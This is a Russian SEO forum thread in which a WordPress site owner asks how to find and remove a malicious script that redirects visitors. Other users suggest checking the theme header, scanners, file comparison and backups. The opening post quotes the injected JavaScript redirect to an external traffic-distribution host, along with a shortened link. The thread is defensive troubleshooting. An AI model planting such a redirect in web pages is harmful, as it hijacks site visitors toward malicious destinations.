SEO Сообщество: Спрашивайте и помогайте

Присоединяйтесь к сообществу профессиональных веб-мастеров PR-CY, отвечайте на вопросы коллег и задавайте свои.

Q&A SEO

Как найти вредоносный скрипт? Срочно!

Алексей Алексей  
23
  24.08.2017 23:03       2 227    
На сайте вордпрес fish-haus.ru завелся вредоносный скрипт. Как его найти и удалить, или какие действия предпринять. Идет пере направления с сайта

function process(){ window.location = "http://sl0n.xyz/tds/?s=1m7"; } window.onerror = process; process()
Вставки с опасных сайтов✖http://bit.ly/2uq9BnM<SCRIPT>"

Ответы на пост (16) Написать ответ
Алексей Алексей
23
25.08.2017 10:10
После появления сообщил в поддержку хостеру. Сегодня с утра все исправил. Только просела посещаемость на треть, да и поведенческие какие то странные, очень не хорошие.
0
Решение
vtr666 vtr666
2
24.08.2017 23:46
А это что за виджет у вас там? - ссылка такая yastatic.net/es5-shims/0.0.2/es5-shims.min.js
0
Алексей Алексей
23
24.08.2017 23:53
Даже не знаю, сейчас посмотрю! Спасибо!
0
Алексей Алексей
23
24.08.2017 23:55
Нашел строку в хейдере темы, выполняющий данный скрипт. Удалил все заработало. Вопрос как найти теперь этот скрипт, чтобы в будущем не было подобного и как он вообще мог там оказаться?
0
vtr666 vtr666
2
25.08.2017 00:04
Я не говорю, что именно это был вирус. Вообще, у вас там ковыряться надо, смотреть. Установите плагин Theme Authenticity Checker и смотрите.
0
Алексей Алексей
23
24.08.2017 23:58
Да и со смарта еще идет переадресация, блин
0
styopa styopa
206
25.08.2017 00:39
Этот window.locationwindow.location скрип в хедере прописываться ищите іndex.php или heder
0
Алексей Алексей
23
25.08.2017 01:03
Спасибо в ПК версии нашел скрипт, а в при просмотре в мобилке не могу, все равно перенаправляется
0
мобилка иногда кэширует сайт, и чтоб перенаправление или какие то баги пропали ,которых уже нет на обычном сайте достаточно сбросить кэш на ней
Или в шаблоне поискать отдельный index.php под мобилу, если там такой предусмотрен (бывает и так)
0
Алексей Алексей
23
25.08.2017 01:48
Ок, спасибо!
0
sansan sansan
1680
25.08.2017 07:58
Есть достаточно эффективный серверный "убийца" вредоносной "бяки". https://revisium.com/ai/
Загрузил, запустил, нашел, удалил. Бесплатно.
Находит, однако, много "не по делу", ну... зато "бяку" - гарантировано. Надо, всё же, знать - что "сносишь".
Собстно, стоит и для профилактики переодически "прогонять".
0
redshrey redshrey
17
25.08.2017 08:39
Я нашел при сравнении файлов сайта (шаблона) моего и скачанного чистого.
0
akeelow akeelow
9
25.08.2017 08:45
Лучше на кворке заплатить 500 рублей. Там спец сидит с огромным стажем. Около 400 заказов выполнил. Только положительные отзывы. Высший ретинг на сайте. Я бы доверился ему https://kwork.ru/configuration/40428/poisk-i-udalenie-virusov-na-vashem-sayte?ref=1673
0
BMDBMW BMDBMW
34
25.08.2017 13:00
Нет, лучше самому понять что за код и как появился, заплатить то можно, но уловить суть и избежать в дальнейшем не получится
0
BelTexnik Tankovick BelTexnik Tankovick
1
25.08.2017 14:05
Такая же беда, но хостингу всеровно, написал что косяк у нас. Сайт прогнали всеми возможными сервисами и антивирусами на пк. Переадресация срабатывает рандомно и на разные сайты.
0
florai florai
10
25.08.2017 18:21
Однажды у нас на рабочем сайте была примерно такая же проблема, то реклама окрывалась посетителям в новом окне, то перенаправление. В общем сделали бэкап на несколько дней назад и все прекратилось. Как этот вредный код туда попал - загадка. В общем откат помогает.
0